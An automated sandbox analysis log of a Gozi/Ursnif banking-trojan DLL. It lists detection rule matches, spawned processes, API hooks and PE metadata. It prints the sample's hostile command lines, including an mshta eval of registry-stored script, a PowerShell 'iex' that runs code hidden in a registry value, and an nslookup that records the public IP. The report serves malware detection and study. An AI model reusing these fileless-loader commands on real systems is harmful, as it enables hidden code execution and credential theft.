          Source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winDLL@36/159@18/4
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033F31DD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,2_2_033F31DD
          Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8F499AAE-6FE9-11EB-90EB-ECF4BBEA1588}.datJump to behavior
          Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{FE45D668-45B5-E0A5-BF12-491463668D88}
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{F61F46FF-DD96-98AA-178A-614C3B5E2540}
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_01
          Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{3E959709-853B-20F7-FF52-8954A3A6CDC8}
          Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF7FAEED37798869B9.TMPJump to behavior
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllVirustotal: Detection: 16%
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllReversingLabs: Detection: 10%
          Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll'
          Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
          Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
          Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17410 /prefetch:2
          Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82962 /prefetch:2
          Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17422 /prefetch:2
          Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82978 /prefetch:2
          Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3AD7.tmp' 'c:\Users\user\AppData\Local\Temp\gayi4abp\CSC8A545143BD644266B89F65F281FEEFE4.TMP'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4CF7.tmp' 'c:\Users\user\AppData\Local\Temp\wi0gyoxl\CSCA00873215094E3995281D323D18ADB7.TMP'
          Source: unknownProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
          Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
          Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\9090.bi1'
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
          Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17410 /prefetch:2Jump to behavior
          Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82962 /prefetch:2Jump to behavior
          Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17422 /prefetch:2Jump to behavior
          Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82978 /prefetch:2Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline'
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3AD7.tmp' 'c:\Users\user\AppData\Local\Temp\gayi4abp\CSC8A545143BD644266B89F65F281FEEFE4.TMP'
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4CF7.tmp' 'c:\Users\user\AppData\Local\Temp\wi0gyoxl\CSCA00873215094E3995281D323D18ADB7.TMP'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\9090.bi1'
          Source: C:\Windows\explorer.exeProcess created: unknown unknown
          Source: C:\Windows\explorer.exeProcess created: unknown unknown
          Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
          Source: C:\Windows\explorer.exeFile opened: C:\Windows\SYSTEM32\msftedit.dll
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.810092544.0000017964DD0000.00000002.00000001.sdmp, csc.exe, 0000001C.00000002.818415180.0000022D72ED0000.00000002.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000020.00000000.838540739.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.832600634.0000000006750000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: explorer.exe, 00000020.00000003.877702647.0000000006AD0000.00000004.00000001.sdmp
          Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.832600634.0000000006750000.00000004.00000001.sdmp
          Source: Binary string: \wl.pdb9 source: powershell.exe, 00000017.00000003.858136800.000001F6E100F000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: explorer.exe, 00000020.00000003.877702647.0000000006AD0000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000020.00000000.838540739.0000000005A00000.00000002.00000001.sdmp
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

          Data Obfuscation:

          barindex
          Suspicious powershell command line foundShow sources
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline'
          Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033FAF23 push ecx; ret 2_2_033FAF33
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033FABF0 push ecx; ret 2_2_033FABF9
          Source: C:\Windows\explorer.exeCode function: 32_2_04DAC115 push 3B000001h; retf 32_2_04DAC11A
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DAC115 push 3B000001h; retf 33_2_00DAC11A
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A433C115 push 3B000001h; retf 35_2_000001E7A433C11A
          Source: initial sampleStatic PE information: section name: .text entropy: 6.87914572387
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756986766.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.757116216.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756877993.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.757051571.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756945473.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.825598679.0000000003470000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.845341823.0000000003430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756743295.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5424, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5876, type: MEMORY
          Hooks registry keys query functions (used to hide registry keys)Show sources
          Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
          Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
          Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C
          Modifies the import address table of user mode modules (user mode IAT hooks)Show sources
          Source: explorer.exeEAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
          Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
